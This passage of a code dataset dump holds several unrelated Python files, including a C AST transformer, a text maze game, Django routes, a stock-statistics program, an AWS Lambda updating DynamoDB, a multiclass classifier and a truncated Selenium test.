type_info, None))\n elif isinstance(arg, c_ast.Typename):\n type_info = self.visit(arg.type)\n args.append(FuncArgInfo(arg.name, type_info, None))\n elif isinstance(arg, c_ast.EllipsisParam):\n args.append(None)\n self.scope = prev_scope\n type_info = LambdaFuncTypeInfo(func_name, return_type_info, args, node, self)\n self.lambdas[func_name] = type_info\n return LambdaFuncExpression(type_info, node)\n\n def schedule_decl(self, decl, prepend=False):\n if not isinstance(decl, (list, tuple)):\n assert decl is not None\n self.scheduled_decls.append((decl, prepend))\n else:\n self.scheduled_decls += [(d, prepend) for d in decl]\n\n def schedule_tmp_decl(self, decl):\n self.scheduled_tmp_decls.append(decl)\n\n def make_async_state_switch(self):\n switch_node = c_ast.Switch(\n c_ast.StructRef(c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME), '->', c_ast.ID('__state')),\n c_ast.Compound(list())\n )\n switch_node.stmt.block_items.append(\n c_ast.Case(\n c_ast.Constant('int', '0'),\n [c_ast.Break()]\n )\n )\n for id, label in iteritems(self.func_async_states):\n switch_node.stmt.block_items.append(\n c_ast.Case(\n c_ast.Constant('int', str(id)),\n [c_ast.Goto(label)]\n )\n )\n switch_node.stmt.block_items.append(\n c_ast.Default(\n [c_ast.Goto('__exit')]\n )\n )\n return switch_node\n\n def make_async_state_struct_fields_list(self):\n state_struct_fields = list()\n state_struct_fields.append(c_ast.Decl(\n LambdaFuncTypeInfo.CLOSURE_FUNC_LINK_NAME,\n list(), list(), list(),\n c_ast.PtrDecl(\n list(),\n c_ast.TypeDecl(\n LambdaFuncTypeInfo.CLOSURE_FUNC_LINK_NAME,\n list(),\n c_ast.IdentifierType(['void'])\n )\n ),\n None, None\n ))\n state_struct_fields.append(c_ast.Decl(\n '__state',\n list(), list(), list(),\n c_ast.TypeDecl(\n '__state',\n list(),\n c_ast.IdentifierType(['int'])\n ),\n None, None\n ))\n self.fix_async_func(self.node_path[-1])\n for field_name, field_decl in iteritems(self.func_async_state_decls):\n if isinstance(field_decl, c_ast.Decl):\n state_struct_fields.append(field_decl)\n return state_struct_fields\n\n def fix_async_func(self, node):\n if isinstance(node, c_ast.FuncDef):\n node.body = self.fix_async_func(node.body)\n elif isinstance(node, c_ast.Decl):\n node.init = self.fix_async_func(node.init)\n if node.name in self.func_async_state_decls:\n init = node.init\n node.init = None\n self.func_async_state_decls[node.name] = node\n if init is not None:\n return c_ast.Assignment(\n '=',\n c_ast.StructRef(\n c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME), '->',\n c_ast.ID(node.name)\n ),\n init,\n node.coord\n )\n return None\n elif isinstance(node, c_ast.BinaryOp):\n node.left = self.fix_async_func(node.left)\n node.right = self.fix_async_func(node.right)\n return node\n elif isinstance(node, c_ast.UnaryOp):\n node.expr = self.fix_async_func(node.expr)\n elif isinstance(node, c_ast.Assignment):\n node.lvalue = self.fix_async_func(node.lvalue)\n node.rvalue = self.fix_async_func(node.rvalue)\n elif isinstance(node, c_ast.FuncCall):\n node.name = self.fix_async_func(node.name)\n node.args = self.fix_async_func(node.args)\n elif isinstance(node, c_ast.ExprList):\n i = 0\n while i < len(node.exprs):\n node.exprs[i] = self.fix_async_func(node.exprs[i])\n i += 1\n elif isinstance(node, c_ast.If):\n node.cond = self.fix_async_func(node.cond)\n node.iftrue = self.fix_async_func(node.iftrue)\n node.iffalse = self.fix_async_func(node.iffalse)\n elif isinstance(node, c_ast.While):\n node.cond = self.fix_async_func(node.cond)\n node.stmt = self.fix_async_func(node.stmt)\n elif isinstance(node, c_ast.DoWhile):\n node.cond = self.fix_async_func(node.cond)\n node.stmt = self.fix_async_func(node.stmt)\n elif isinstance(node, c_ast.For):\n node.init = self.fix_async_func(node.init)\n node.cond = self.fix_async_func(node.cond)\n node.next = self.fix_async_func(node.next)\n node.stmt = self.fix_async_func(node.stmt)\n elif isinstance(node, c_ast.Switch):\n node.cond = self.fix_async_func(node.cond)\n node.stmt = self.fix_async_func(node.stmt)\n elif isinstance(node, c_ast.Compound):\n i = 0\n while i < len(node.block_items):\n node.block_items[i] = self.fix_async_func(node.block_items[i])\n if node.block_items[i] is None:\n del node.block_items[i]\n else:\n i += 1\n elif isinstance(node, c_ast.ArrayRef):\n node.name = self.fix_async_func(node.name)\n node.subscript = self.fix_async_func(node.subscript)\n elif isinstance(node, c_ast.StructRef):\n node.name = self.fix_async_func(node.name)\n elif isinstance(node, c_ast.ID):\n if node.name in self.func_async_state_decls:\n return c_ast.StructRef(\n c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME), '->',\n c_ast.ID(node.name)\n )\n elif isinstance(node, c_ast.Return):\n if node.expr is not None:\n raise CodeSyntaxError('Async function cannot return value', node.coord)\n if node not in self.async_returns:\n return c_ast.Goto('__exit', node.coord)\n return node\n","sub_path":"c_ext/ast_transformer.py","file_name":"ast_transformer.py","file_ext":"py","file_size_in_byte":35591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329436570","text":"from .room import Room\nfrom .shrine import Shrine\nfrom .item import Item\nfrom .guardians import *\n\n\n# 0 -> Empty space\n# 1 -> Tunnel\n# 2 -> Multip\n# 3 -> Divid\n# 4 -> Square\n# 5 -> Radical\n# 6 -> Artifact\nroom_template = [\n [\"Entrance\", \"Return here with the mathematical artifact. Use it to escape this maze!\"],\n [\"Tunnel\", \"Nothing extravagant. An Empty tunnel.\"],\n [\"Multip Shrine\", \"The Shrine of the Multip sign, granting the power of multiplication.\", [\n Item(\"Multip\")], MultipGuardian()],\n [\"Divid Shrine\", \"The Shrine of the Divid sign, granting the power of division.\", [\n Item(\"Divid\")], DividGuardian()],\n [\"Square Shrine\", \"The Shrine of the Square sign, granting the power of squaring.\", [\n Item(\"Square\")], SquareGuardian()],\n [\"Radical Shrine\", \"The Shrine of the Radical sign, granting the power of square and cube rooting.\", [\n Item(\"Radical\")], RadicalGuardian()],\n [\"Artifact Shrine\", \"The Shrine of the Ancient Mathematical Artifact! Grab it, and get out of here!\", [\n Item(\"Artifact\")], ArtifactGuardian()]\n]\n\n\nclass GameMap:\n\n def __init__(self):\n self.map = self.create_map()\n self.entrance = self.map[4][1]\n\n def create_map(self):\n \"\"\"\n Creates a map like this:\n [S] [ ][ ]\n [ ][ ][ ][ ][S]\n [ ] [S] [ ]\n [ ][S] [ ]\n [ ][X] [A][ ]\n \"\"\"\n # 0 -> Empty space\n # 1 -> Tunnel\n # 2 -> Multip\n # 3 -> Divid\n # 4 -> Square\n # 5 -> Radical\n # 6 -> Artifact\n # 7 -> Entrance\n empty_array = [\n [2, 0, 0, 1, 1],\n [1, 1, 4, 1, 3],\n [1, 0, 1, 0, 1],\n [1, 5, 0, 0, 1],\n [1, 7, 0, 6, 1]\n ]\n return [self.create_rooms(arr) for arr in empty_array]\n\n def create_rooms(self, room_arr):\n \"\"\"Creates a room for each number value from the given array\"\"\"\n rooms = []\n for room_id in room_arr:\n if room_id == 0:\n # If id is 0, no room\n rooms.append(None)\n elif room_id == 7:\n # If id is 7, Entrance Room\n rooms.append(Room(*room_template[0]))\n elif room_id == 1:\n # If id is 1, Tunnel\n rooms.append(Room(*room_template[1]))\n else:\n # Use the values from the room_template to create a new room\n rooms.append(Shrine(*room_template[room_id]))\n return rooms\n","sub_path":"python/src/models/game_map.py","file_name":"game_map.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271832892","text":"# -*- coding: utf-8 -*-\n\n# Core\nfrom django.conf.urls import url\n\n# Project\nfrom .views import complete_order, order_list_dispatcher, order_detail_dispatcher, ChangeProductStatusView\n\nurlpatterns = [\n\n url(r'^$',\n order_list_dispatcher,\n name='list'),\n\n url(r'^(?P\\d+)/$',\n order_detail_dispatcher,\n name='detail'),\n\n url(r'^complete/$',\n complete_order,\n name='complete_order'),\n\n url(r'^change_product_status/$',\n ChangeProductStatusView.as_view(),\n name='change_product_status'),\n\n]","sub_path":"cakes_delivery/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"377100447","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2020 red \n#\n# Distributed under terms of the MIT license.\n\n\"\"\"\n\n\"\"\"\nimport unittest\n\nfrom my_sum import sum\n\n\nclass TestSum(unittest.TestCase):\n def test_list_int(self):\n \"\"\"\n Test that it can sum a list of integers\n \"\"\"\n data = [1, 2, 3]\n result = sum(data)\n self.assertEqual(result, 6)\n\n\n def test_list_fraction(self):\n \"\"\"\n Test that it can sum a list of fractions\n \"\"\"\n data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 5)]\n result = sum(data)\n self.assertEqual(result, 1)\n\n\n def test_bad_type(self):\n data = \"banana\"\n with self.assertRaises(TypeError):\n result = sum(data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"bPot/Py3Robot/project/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599336042","text":"#!/usr/bin/env python\n# Created at 2020/5/13\nimport pickle\n\nimport click\nimport numpy as np\nimport torch\n\nfrom Utils.env_util import get_env_info\n\n\n@click.command()\n@click.option(\"--env_id\", type=str, default=\"Swimmer-v3\", help=\"Environment Id\")\n@click.option(\"--n_trajs\", type=int, default=1000, help=\"Number of trajectories to sample\")\n@click.option(\"--model_path\", type=str, default=\"../PPO/trained_models/Swimmer-v3_ppo.p\",\n help=\"Directory to load pre-trained model\")\n@click.option(\"--data_path\", type=str, default=\"./data\", help=\"Directory to store expert trajectories\")\n@click.option(\"--render\", type=bool, default=False, help=\"Render environment flag\")\n@click.option(\"--seed\", type=int, default=2020, help=\"Random seed for reproducing\")\ndef main(env_id, n_trajs, model_path, data_path, render, seed):\n \"\"\"\n Collect trajectories from pre-trained models by PPO\n \"\"\"\n env, _, num_states, num_actions = get_env_info(env_id)\n\n # seed\n env.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n states, actions, rewards, ep_rewards = [], [], [], []\n\n model = pickle.load(open(model_path, 'rb'))\n model.running_state.fix = True\n for i_iter in range(1, n_trajs + 1):\n\n state = env.reset()\n ep_reward = 0\n n_step = 0\n\n while True:\n if render:\n env.render()\n state = model.running_state(state)\n action, _ = model.choose_action(state)\n action = action.cpu().numpy()[0]\n state, reward, done, _ = env.step(action)\n\n ep_reward += reward\n n_step += 1\n\n states.append(state)\n actions.append(action)\n rewards.append(reward)\n\n if done:\n ep_rewards.append(ep_reward)\n print(f\"Iter: {i_iter}, step: {n_step}, episode Reward: {ep_reward}\")\n break\n\n env.close()\n\n states = np.r_[states].reshape((-1, num_states))\n actions = np.r_[actions].reshape((-1, num_actions))\n rewards = np.r_[rewards].reshape((-1, 1))\n ep_rewards = np.r_[ep_rewards].reshape((n_trajs, -1))\n\n numpy_dict = {\n 'state': states,\n 'action': actions,\n 'reward': rewards,\n 'ep_reward': ep_rewards,\n } # type: Dict[str, np.ndarray]\n\n if data_path is not None:\n np.savez(f\"{data_path}/{env_id}.npz\", **numpy_dict)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Algorithms/pytorch/GAIL/expert_trajecotry_collector.py","file_name":"expert_trajecotry_collector.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503922203","text":"from __future__ import print_function\n\nimport sys\nimport locale\n\nfrom counter import Counter\n\n\ntry:\n import matplotlib.pyplot as plt\nexcept ImportError:\n plt = None\n\n\nclass Processor:\n '''A Processor can process a single text file from a corpus. It is\n initialized using a Language object, providing language specific\n knowledge for processing.\n\n The Processor can be customized to \n '''\n\n n_low = 1\n n_high = 100\n\n _match_number_words_flag = True\n _show_progress_flag = True\n verbosity = 1\n\n _counter = None\n\n\n def __init__(self, language, min=0, max=100):\n '''Create a new Processor.\n\n Arguments\n ---------\n language : Language\n min : int\n The minimal value to count. All smaller values will be ignored.\n max : int\n The maximal value to count. All larger values will be ignored.\n '''\n self.language = language\n self._counter = Counter(min=min, max=max)\n\n # if self._match_number_words_flag:\n # self.language.precompile_numberwords(min,max)\n self.language.precompile_regex(min,max)\n\n\n def reset(self):\n '''Reset this processor.\n Resetting will only affect the counters, but not the\n configuration (range of interest, verbosity, etc.).\n '''\n self._counter.reset()\n\n\n def processFile(self, inputStream):\n '''Process an input stream. This is the main function of\n this class. It will read the stream line by line,\n look for numerals, either provided as numbers, or\n in words, and count the occurences.\n\n Arguments\n ---------\n inputStream\n The input stream to read.\n '''\n num = {'lines': 0, 'matches': 0, 'numbers': 0, 'words': 0}\n tripleMatches = [0,0,0,0,0,0]\n \n if self.verbosity > 0:\n sys.stderr.write(\"Starting to process \")\n\n for sentence in inputStream:\n\n # Remove everything before the first tabulator.\n # This is relevant for lines from the \"Wortschatz\" corpus,\n # as these lines have the format running_number-TAB-sentence.\n if \"\\t\" in sentence:\n sentence = sentence.split(\"\\t\")[1]\n\n # look for ALL occurences of numbers (digits)\n info = self.language.match_expression(sentence)\n self._counter(info[0]) # occurrences of numbers\n\n if info[0]:\n num['matches'] += 1\n num['numbers'] += len(info[0])\n \n # look for occurences of number words\n # if self._match_number_words_flag:\n self._counter(info[1]) # ocurrences of numberwords\n \n if info[1]:\n num['words'] += len(info[1])\n\n \n # [p] preliminary: returns counts of tuples\n tripleMatches = [tripleMatches[i]+info[2][i] for i in range(len(tripleMatches))]\n\n\n # output progress information (if desired)\n if self._show_progress_flag and (num['lines'] % 100000 == 0):\n sys.stderr.write('.' if self.verbosity > 0 else\n r'{}\\r'.format(num['lines']))\n sys.stderr.flush()\n num['lines'] += 1\n\n if self.verbosity > 0:\n print(\" processed {0} lines.\".\n format(locale.format(\"%d\", num['lines'], grouping=True)),\n file=sys.stderr)\n elif self._show_progress_flag:\n print(file=sys.stderr)\n\n if self.verbosity > 1:\n print(\"Some statistics:\")\n print(\" * {0} of these lines ({1}%) contain numbers\".\n format(locale.format(\"%d\", num['matches'], grouping=True),\n num['matches']*100//num['lines'] if num['lines'] > 0 else 100))\n print(\" * in total we found {0} numbers\".\n format(locale.format(\"%d\", num['numbers'], grouping=True)))\n print(\" * {0} of these numbers are in the range of interest ({1}-{2})\".\n format(locale.format(\"%d\", self._counter.sum(),\n grouping=True),\n self.n_low,self.n_high))\n print(\" * there were also {0} occurences of number words (not used yet!)\".\n format(locale.format(\"%d\", num['words'], grouping=True)))\n print(' * occurrences of approx-num-combinations in order prec+round, prec+nonr, impr+round, impr+nonr, null+round, null+nonr:', tripleMatches) # [p] preliminary, can be done less ugly\n\n\n def plotBars(self):\n '''Plot a bar chart.\n '''\n\n if plt is None:\n print(\"error: no matplotlib seems to be installed. Install it before trying to plot.\", file=sys.stderr)\n print(\"info: matplotlib is available for free from https://matplotlib.org/\", file=sys.stderr)\n else:\n numbers = range(self.n_low, self.n_high + 1)\n values = list(map(lambda x: self._counter[x], numbers))\n plt.bar(numbers, values)\n plt.show()\n","sub_path":"numerals/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"415279457","text":"#\n# TT Securities, Incorporated\n# Name: Lawrence Mao\n# Date: 10-28-17\n#\n\nimport math\nimport time\n\ndef makeList(numString):\n \"\"\"\n Helper for main()\n \"\"\"\n numString = numString.replace('[', '')\n numString = numString.replace(']', '')\n numList = numString.split(',')\n L = []\n for x in numList:\n L.append(float(x.strip()))\n return L\n\ndef main():\n \"\"\"\n This program should:\n - Offer the user choices 0-6 and 9. \n - Print a warning message if the integer is not a valid menu option\n - Quit if the user inputs 9\n - Allow the user to input a new list of stock prices, if the user selects choice 0\n - Print a table of days and prices, with labels, if the user selects choice 1\n - Compute the appropriate statistics about the list for choices 2-6\n \"\"\"\n isQuit = False\n L = []\n while isQuit == False:\n print (\"(0) Input a new list\")\n print (\"(1) Print the current list\")\n print (\"(2) Find the average price\")\n print (\"(3) Find the standard deviation\")\n print (\"(4) Find the min and its day\")\n print (\"(5) Find the max and its day\")\n print (\"(6) Your TT investment plan\")\n print (\"(7) Go on a text-based adventure!\")\n print (\"(9) Quit\")\n print \n choice = int(input(\"Enter your choice: \"))\n if choice == 9:\n isQuit = True\n elif choice == 0:\n numString = input(\"Enter a new list of prices: \")\n L = makeList(numString)\n elif choice == 1:\n printList(L)\n elif choice == 2:\n print (\"The average price is\", averagePrice(L))\n elif choice == 3:\n print (\"The st. deviation is\", standardDev(L))\n elif choice == 4:\n ans = minDay(L)\n print (\"The min is\", ans[0], \"on day\", ans[1])\n elif choice == 5:\n ans = maxDay(L)\n print (\"The max is\", ans[0], \"on day\", ans[1])\n elif choice == 6:\n ans = TTPlan(L)\n print (\"Your TTS investment strategy is to\")\n print \n print (\" Buy on day\", ans[0], \"at price\", L[ans[0]])\n print (\" Sell on day\", ans[1], \"at price\", L[ans[1]])\n print (\" For a total profit of\", ans[2])\n elif choice == 7:\n delay = 10.0 # change to 0.0 for testing/speed runs; larger for dramatic effect!\n score = 0 # if score is >= 3, then user aces the sat/act\n\n yesOrNo = input(\"Do you wish to proceed with this adventure? (y/n)\")\n\n if yesOrNo == 'y':\n username = input(\"What do they call you, worthy adventurer? \")\n\n print()\n print(\"Welcome,\", username, \" to the SAT study simulator\")\n print(\"where your actions determine your fate\")\n print()\n\n print(\"Your quest: To ace the SAT / ACT\")\n print()\n test = input(\"What test shall you overcome? (SAT/ACT) \")\n if test == \"ACT\":\n print(\"Aha, the kind that does well under time constraints!\")\n elif test == \"SAT\":\n print(\"Hm... the kind that enjoys texts which boggle the mind...\")\n else:\n print(\"Each to their own, then.\")\n print()\n\n print(\"On to the quest!\\n\\n\")\n print(\"You've just gotten back home from school. You have two options: To complete\")\n print(\"your homework or to study for the \" , test, \". Keep in mind, you have the\")\n print(\"test in 2 days.\")\n time.sleep(5)\n print()\n\n choice1 = input(\"Do you choose the homework or the prep? [homework/prep] \")\n print()\n\n if choice1 == \"homework\":\n print(\"Being the good little student you are, you plop down to your seat and\")\n print(\"finish the homework due tomorrow. After you finish, you are surprised that\")\n print(\"six hours have passed. It is now 12:00 AM! Will you sleep or do some prep?\")\n\n else: \n print(\"Being the ambitious person you are, you plop down to your seat and\")\n print(\"prep furiously. After you finish, you are surprised that\")\n print(\"six hours have passed. It is now 12:00 AM! Will you continue studying or sleep?\")\n score = score + 1\n\n choice2 = input(\"What will you do at this late hour? [sleep/prep]\")\n print () \n\n if choice2 == 'sleep':\n print(\"You sleep 7 hours! (Better than what I get...) and wake up refreshed\\n\\n\")\n elif choice2 == 'prep':\n print(\"Quite the studious one ey? Well then... You sleep 5 hours!... and wake up souless \\n\\n\")\n score = score + 1\n \n time.sleep(delay)\n\n print (\"A month has passed. You have taken the\", test, \"and now here are the results...\")\n time.sleep(delay)\n\n if test == 'SAT' and score > 1:\n print (\"You got a 1600!!!!!! Off to college baby!\")\n elif test == 'SAT' and score == 1:\n print (\"You got a 1370! Not bad!\")\n elif test == 'ACT' and score >1:\n print (\"You got a 36!!!!! Off to college baby!\")\n elif test == 'ACT' and score == 1:\n print (\"You got a 30! Not bad!\")\n else:\n print (\"You forgot there even was a test and never took it... What a shame, you looked so ambitious.\")\n\n else:\n print (\"The choice\", choice, \"is not an option.\")\n print (\"Try again\")\n print\n print (\"See you yesterday!\")\ndef TTPlan (L):\n maxV = -(1 << 30)\n ans = []\n for x in range(len(L)):\n for y in range(1, len(L)):\n if L[y] - L[x] > maxV:\n maxV = L[y] - L[x]\n ans = [x, y, maxV]\n return ans\ndef maxDay (L):\n maxV = -(1 << 30)\n index = 0\n for x in range(len(L)):\n if L[x] > maxV:\n maxV = L[x]\n index = x\n return [maxV, index]\ndef minDay (L):\n minV = 1 << 30\n index = 0\n for x in range(len(L)):\n if L[x] < minV:\n minV = L[x]\n index = x\n return [minV, index]\ndef standardDev (L):\n ave = averagePrice(L)\n s = 0.0\n for x in L:\n s += (x - ave)**2\n return math.sqrt(s / len(L))\ndef averagePrice (L):\n s = 0.0\n for x in L:\n s += x\n return s / len(L)\ndef printList (L):\n print\n print (\"Day Price\")\n print (\"--- -----\")\n for x in range(len(L)):\n print (\"%3d %5.2f\" %(x, L[x]))\n print\n \nmain()","sub_path":"Week8/hw8pr4.py","file_name":"hw8pr4.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633831900","text":"from utils import awsHelper as awsUtils\nfrom decimal import Decimal\nimport json\n\n# used when json.dumps cannot by default decode an element\ndef default(obj):\n if isinstance(obj, Decimal):\n return float(obj)\n raise TypeError(\"Object of type '%s' is not JSON serializable\" % type(obj).__name__)\n\n\ndef handler(event, context):\n\n required_args_present=False\n try:\n required_args_present = set(['project_id']).issubset(set(list(json.loads(event[\"body\"]).keys())))\n except Exception as e:\n return {\n \"statusCode\" : \"400\" ,\n \"headers\" : {\n \"Content-Type\" : \"application/json\" ,\n \"Access-Control-Allow-Headers\" : 'Content-Type' ,\n \"Access-Control-Allow-Origin\" : \"*\" ,\n \"Access-Control-Allow-Methods\" : \"POST, OPTIONS\" ,\n \"Access-Control-Allow-Credentials\" : True\n },\n \"body\": json.dumps({\"ERROR\":\"Error getting body of request, it may not have been passed correctly\",\n \"Exception\":str(e)})\n }\n\n if (not required_args_present):\n return {\n \"statusCode\" : \"400\" ,\n \"headers\" : {\n \"Content-Type\" : \"application/json\" ,\n \"Access-Control-Allow-Headers\" : 'Content-Type' ,\n \"Access-Control-Allow-Origin\" : \"*\" ,\n \"Access-Control-Allow-Methods\" : \"POST, OPTIONS\" ,\n \"Access-Control-Allow-Credentials\" : True\n },\n \"body\": json.dumps({\"ERROR\":\"The required argument [project_id] is not present\"})\n }\n\n\n # all the args are present so can put in ddb\n input_data = json.loads(event[\"body\"])\n name = input_data.get(\"name\", None)\n description = input_data.get(\"description\", None)\n picture = input_data.get(\"picture\", None)\n team = input_data.get(\"team\", None)\n school = input_data.get(\"school\", None)\n tech = input_data.get(\"tech\", None)\n college = input_data.get(\"college\", None)\n links = input_data.get(\"links\", None)\n booth_number = input_data.get(\"booth_number\", None)\n project_id = input_data.get(\"project_id\", None)\n\n ddb = awsUtils.connect_ddb()\n response=ddb.Table('osu-expo-projects').update_item(\n Key={'project_id':project_id},\n UpdateExpression=\"SET #NAME_ATTR = :NAME_VAL, #DESC_ATTR = :DESC_VAL, #PICTURE_ATTR = :PICTURE_VAL, #TEAM_ATTR = :TEAM_VAL, #SCHOOL_ATTR = :SCHOOL_VAL, #TECH_ATTR = :TECH_VAL, #COLLEGE_ATTR = :COLLEGE_VAL, #LINKS_ATTR = :LINKS_VAL, #BOOTHNUMBER_ATTR = :BOOTHNUMBER_VAL\",\n ExpressionAttributeNames = {\n \"#NAME_ATTR\":\"name\",\n \"#DESC_ATTR\":\"description\",\n \"#PICTURE_ATTR\":\"picture\",\n \"#TEAM_ATTR\":\"team\",\n \"#SCHOOL_ATTR\":\"school\",\n \"#TECH_ATTR\":\"tech\",\n \"#COLLEGE_ATTR\":\"college\",\n \"#LINKS_ATTR\":\"links\",\n \"#BOOTHNUMBER_ATTR\":\"booth_number\"\n },\n ExpressionAttributeValues={\n \":NAME_VAL\": str(name),\n \":DESC_VAL\": str(description),\n \":PICTURE_VAL\": str(picture),\n \":TEAM_VAL\": team,\n \":SCHOOL_VAL\": str(school),\n \":TECH_VAL\": str(tech),\n \":COLLEGE_VAL\": str(college),\n \":LINKS_VAL\": links,\n \":BOOTHNUMBER_VAL\":booth_number\n }\n )\n\n\n ret = {\n \"statusCode\" : \"200\" ,\n \"headers\" : {\n \"Content-Type\" : \"application/json\" ,\n \"Access-Control-Allow-Headers\" : 'Content-Type' ,\n \"Access-Control-Allow-Origin\" : \"*\" ,\n \"Access-Control-Allow-Methods\" : \"POST, OPTIONS\" ,\n \"Access-Control-Allow-Credentials\" : True\n },\n \"body\": json.dumps( response,default=default)}\n\n return ret\n","sub_path":"lambdas/update-project-details/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"561111329","text":"import os\nimport glob\nimport tarfile\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass PackageBuilder:\n def __init__(self, path):\n self.archive = tarfile.TarFile(name=path, mode='a')\n\n def addAll(self, path, pattern='*'):\n \"\"\"Add all items from path that match pattern\"\"\"\n currentDir = os.getcwd()\n if os.path.exists(path):\n # Set CWD to the path\n os.chdir(path)\n for item in glob.glob(pattern):\n self.archive.add(item)\n log.info('Added: ' + str(item))\n # Restore the CWD\n os.chdir(currentDir)\n else:\n log.error('Not a valid path: ' + str(path))\n\n def save(self):\n self.archive.close()\n","sub_path":"chiptools/core/package_builder.py","file_name":"package_builder.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"503579944","text":"import optimization\nimport oracles\nimport numpy as np\nimport itertools\n\n\nclass MulticlassStrategy: \n def __init__(self, classifier, mode, **kwargs):\n \n self.classifier = classifier\n self.arg = kwargs\n self.mode = mode \n \n def fit(self, X, y):\n \n K = np.amax(y) + 1\n self.features = X.shape[1]\n if self.mode == 'one_vs_all':\n self.mas = []\n for j in np.arange(0, K, 1):\n y_new = np.empty_like(y)\n y_new[y == j] = 1\n y_new[y != j] = -1\n self.mas.append(self.classifier(**self.arg))\n self.mas[j].fit(X, y_new, w_0=np.zeros(X.shape[1]))\n else:\n self.dict = {}\n for i in itertools.combinations(np.arange(K), 2):\n X_new = X[np.logical_or(y == i[0], y == i[1])]\n y_new = y[np.logical_or(y == i[0], y == i[1])]\n y_new[y_new == i[0]] = -1\n y_new[y_new == i[1]] = 1\n self.dict[i] = self.classifier(**self.arg)\n self.dict[i].fit(X_new, y_new, w_0=np.zeros(X.shape[1]))\n return self\n \n def predict(self, X):\n \n y = []\n if self.mode == 'one_vs_all':\n for rows in X:\n max = -1\n cl = -1\n for j in range(0, len(self.mas), 1):\n m = rows.dot(self.mas[j].get_weights())\n if (m > max):\n cl = j\n max = m\n y.append(cl)\n else:\n for rows in X:\n ans = []\n for key in self.dict:\n ans.append(key[int((np.sign(rows.dot(self.dict[key].get_weights())) + 1) / 2)])\n y.append(np.argmax(np.bincount(np.asarray(ans)))) \n return y\n \n def get_weights(self):\n if self.mode == 'one_vs_all':\n w = np.zeros((len(self.mas), self.features))\n for j in np.arange(0, len(self.mas), 1):\n w[j] = self.mas[j].get_weights()\n return w\n else:\n w = np.zeros((len(self.dict), self.features))\n i = 0\n for key in self.dict:\n w[i] = self.dict[key].get_weights()\n i += 1\n return w\n","sub_path":"multiclass.py","file_name":"multiclass.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"352364628","text":"import pytest\r\nimport re\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n@pytest.fixture(scope=\"class\")\r\ndef browser(request):\r\n\tbrowser = webdriver.Firefox()\r\n\tbrowser.implicitly_wait(10)\r\n\r\n\tdef fin():\r\n\t\tbrowser.quit()\r\n\trequest.addfinalizer(fin)\r\n\r\n\treturn browser\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestNewVisitor:\r\n\tdef check_for_row_in_list_table(self, row_text):\r\n\t\ttable = self.browser.find_element_by_id('id_list_table')\r\n\t\trows = table.find_elements_by_tag_name('tr')\r\n\t\tassert row_text in [row.text for row in rows]\r\n\r\n\tdef test_can_start_a_list_and_retrieve_it_later(self, browser, live_server):\r\n\t\t# Edith has heard about a cool new online to-do app. She goes\r\n\t\t# to check out its homepage\r\n\t\tself.browser = browser\r\n\t\tbrowser.get(live_server.url)\r\n\r\n\t\t# She notices the page title and header mention to-do lists\t\t\r\n\t\tassert 'To-Do' in browser.title\r\n\t\theader_text = browser.find_element_by_tag_name('h1').text\r\n\t\tassert 'To-Do' in header_text\r\n\r\n\t\t# She is invited to enter a to-do item straight away\r\n\t\tinputbox = browser.find_element_by_id('id_new_item')\r\n\t\tassert inputbox.get_attribute('placeholder') == 'Enter a to-do item'\r\n\r\n\t\t# She types \"Buy peacock feathers\" into a text box )Edith's hobby\r\n\t\t# is tying fly-fishing lures)\r\n\t\tinputbox.send_keys('Buy peacock feathers')\r\n\r\n\t\t# When she hits enter, she is taken to a new URL, and now the page lists\r\n\t\t# \"1: Buy peacock feathers\" as an item in a to-do list table\r\n\t\tinputbox.send_keys(Keys.ENTER)\r\n\t\tedith_list_url = browser.current_url\r\n\t\tpytest.assertRegex(edith_list_url, '/lists/.+')\r\n\t\tself.check_for_row_in_list_table('1: Buy peacock feathers')\r\n\r\n\t\t# There is still a text box inviting her to add anothe item. She\r\n\t\t# enters \"Use peacock feathers to make a fly\" (Edith is very\r\n\t\t# methodical)\r\n\t\tinputbox = browser.find_element_by_id('id_new_item')\r\n\t\tinputbox.send_keys('Use peacock feathers to make a fly')\r\n\t\tinputbox.send_keys(Keys.ENTER)\r\n\r\n\t\t# The page updates again, and now shows both items on her list\r\n\t\tself.check_for_row_in_list_table('1: Buy peacock feathers')\r\n\t\tself.check_for_row_in_list_table('2: Use peacock feathers to make a fly')\r\n\r\n\t\t# Now a new user, Francis, comes along to the site.\r\n\r\n\t\t## We use a new browser session to 